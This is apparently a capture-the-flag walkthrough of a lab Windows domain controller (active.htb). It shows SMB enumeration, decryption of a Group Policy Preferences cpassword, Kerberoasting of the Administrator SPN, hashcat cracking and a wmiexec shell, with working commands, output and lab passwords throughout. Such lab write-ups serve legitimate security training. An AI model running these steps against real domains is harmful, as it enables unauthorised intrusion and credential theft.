Machine Overview
The target machine is a Windows Server Active Directory Domain Controller. Initial access is obtained through anonymous SMB access to the Replication share, which contains Group Policy Preferences (GPP) files with encrypted credentials. After decrypting the GPP password, we authenticate as the SVC_TGS service account. Privilege escalation is achieved via Kerberoasting, where we request service tickets for the Administrator account's Service Principal Name (SPN) and crack the resulting Kerberos ticket to obtain the Administrator password.
Enumeration
Nmap Scan
We begin with a service scan to enumerate open ports:
nmap -A -oN nmap.txt 10.10.10.100Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-03 07:10:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-11-03T07:10:58
|_ start_date: 2025-11-03T07:05:04
| smb2-security-mode:
| 210:
|_ Message signing enabled and requiredFindings:
- Port 53 (DNS): Active Directory DNS service
- Port 88 (Kerberos): Authentication service
- Port 389/636 (LDAP): Active Directory LDAP services
- Port 445 (SMB): File sharing service
- Domain:
active.htb - Hostname:
DC(Domain Controller) - OS: Windows Server 2008 R2 SP1
SMB Enumeration
We attempt to list SMB shares with anonymous access:
smbclient -L //10.10.10.100 -NResults:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup availableSMB Share Access
Using smbmap, we check the permissions on each share:
$ smbmap -H 10.10.10.100
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connectionsThe Replication share has READ ONLY access. We can connect to the Replication share and browse its contents:
smbclient //10.10.10.100/Replication -NNavigating through the directory structure, we find the active.htb domain folder. Within \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\, we discover a Groups.xml file.
This file is part of Group Policy Preferences (GPP), which historically stored passwords in an encrypted format that could be easily decrypted using a known AES key.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>The Groups.xml file contains credentials for the SVC_TGS user. The cpassword attribute contains an encrypted password that can be decrypted using the publicly known AES key used by Microsoft for GPP encryption.
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"Using gpp-decrypt (or gpp-decrypt.py), we can decrypt this password:
$ gpp-decrypt.py -f Groups.xml
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18Authenticating with SVC_TGS Credentials
With the decrypted credentials, we can now authenticate to the domain controller as the SVC_TGS service account:
smbmap -u SVC_TGS -p 'GPPstillStandingStrong2k18' -H 10.10.10.100Results:
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYWe now have read access to the Users share. We can connect to it and retrieve the user flag:
smbclient //10.10.10.100/Users -U SVC_TGSUser flag
smb:\SVC_TGS\Desktop\user.txt
Privilege Escalation
Kerberoasting
With valid domain credentials for the SVC_TGS service account, we can perform a Kerberoasting attack. This technique involves requesting Kerberos service tickets for accounts with Service Principal Names (SPNs) and then attempting to crack the encrypted tickets offline.
Using Impacket's GetUserSPNs.py, we enumerate accounts with SPNs and request their service tickets:
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -outputfile spn.txtWhat is Kerberoasting?
Kerberoasting is an attack technique where an attacker requests service tickets from Active Directory for accounts that have Service Principal Names (SPNs) configured. These tickets are encrypted with the account's password hash, allowing offline brute-force attacks. The attack is particularly effective because any authenticated domain user can request service tickets for accounts with SPNs.
Results:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2025-11-03 08:06:11.140954The output shows that the Administrator account has an SPN configured (active/CIFS:445). The tool automatically requests a service ticket for this account and saves it to spn.txt in a format suitable for password cracking.
Cracking the Kerberos Ticket
We use hashcat to crack the Kerberos ticket hash (mode 13100 for Kerberos 5 TGS-REP etype 23):
hashcat -m 13100 spn.txt /usr/share/wordlists/rockyou.txt --forceResults:
$krb5tgs$...:Ticketmaster1968:Ticketmaster1968Hashcat successfully cracked the password: Ticketmaster1968 for the Administrator user.
Accessing as Administrator
With the Administrator credentials, we can authenticate and obtain a shell using Impacket's wmiexec.py:
$ wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
C:\> whoami
active\administratorWe now have a shell running as the Administrator user with full system privileges.
Root flag
C:\Users\Administrator\Desktop\root.txt